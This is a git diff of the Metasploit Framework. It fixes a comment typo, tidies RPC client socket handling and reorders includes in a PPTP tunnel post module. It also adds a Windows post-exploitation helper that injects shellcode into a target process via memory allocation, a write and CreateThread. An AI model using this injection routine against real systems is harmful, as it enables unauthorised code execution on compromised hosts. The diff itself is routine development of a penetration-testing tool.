diff --git a/lib/msf/core/exploit/smb/psexec.rb b/lib/msf/core/exploit/smb/psexec.rb index 3ba505c6cf..069f97f167 100644 --- a/lib/msf/core/exploit/smb/psexec.rb +++ b/lib/msf/core/exploit/smb/psexec.rb @@ -9,7 +9,7 @@ module Msf # # This code was stolen straight out of the psexec module. Thanks very # much for all who contributed to that module!! Instead of uploading -# and runing a binary. +# and running a binary. #### module Exploit::Remote::SMB::Psexec diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb new file mode 100644 index 0000000000..7ec019563d --- /dev/null +++ b/lib/msf/core/post/windows/process.rb @@ -0,0 +1,40 @@ +# -*- coding: binary -*- + +module Msf +class Post +module Windows + +module Process + + # + # Injects shellcode to a process, and executes it. + # + # @param shellcode [String] The shellcode to execute + # @param base_addr [Fixnum] The base address to allocate memory + # @param pid [Fixnum] The process ID to inject to + # + # @return [Boolean] True if successful, otherwise false + # + def execute_shellcode(shellcode, base_addr, pid=nil) + pid ||= session.sys.process.getpid + host = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + shell_addr = host.memory.allocate(shellcode.length, nil, base_addr) + if host.memory.write(shell_addr, shellcode) < shellcode.length + vprint_error("Failed to write shellcode") + return false + end + + vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})") + ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, 0, nil) + if ret['return'] < 1 + vprint_error("Unable to CreateThread") + return false + end + + true + end + +end # Process +end # Windows +end # Post +end # Msf diff --git a/lib/msf/core/rpc/v10/client.rb b/lib/msf/core/rpc/v10/client.rb index 144e3570df..4379bcf874 100644 --- a/lib/msf/core/rpc/v10/client.rb +++ b/lib/msf/core/rpc/v10/client.rb @@ -12,7 +12,7 @@ module RPC class Client - attr_accessor :sock, :token, :info + attr_accessor :token, :info def initialize(info={}) @@ -67,6 +67,7 @@ class Client ) res = @cli.send_recv(req) + @cli.close if res and [200, 401, 403, 500].include?(res.code) resp = MessagePack.unpack(res.body) @@ -82,8 +83,10 @@ class Client end def close - self.sock.close rescue nil - self.sock = nil + if @cli and @cli.conn? + @cli.close + end + @cli = nil end end diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb index 99fe2eacf1..3f0b9af181 100644 --- a/modules/post/windows/manage/pptp_tunnel.rb +++ b/modules/post/windows/manage/pptp_tunnel.rb @@ -5,11 +5,15 @@ # http://metasploit.com/framework/ ## +require 'msf/core/post/common' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/registry' + class Metasploit3 < Msf::Post - include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File + include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry def initialize(info={})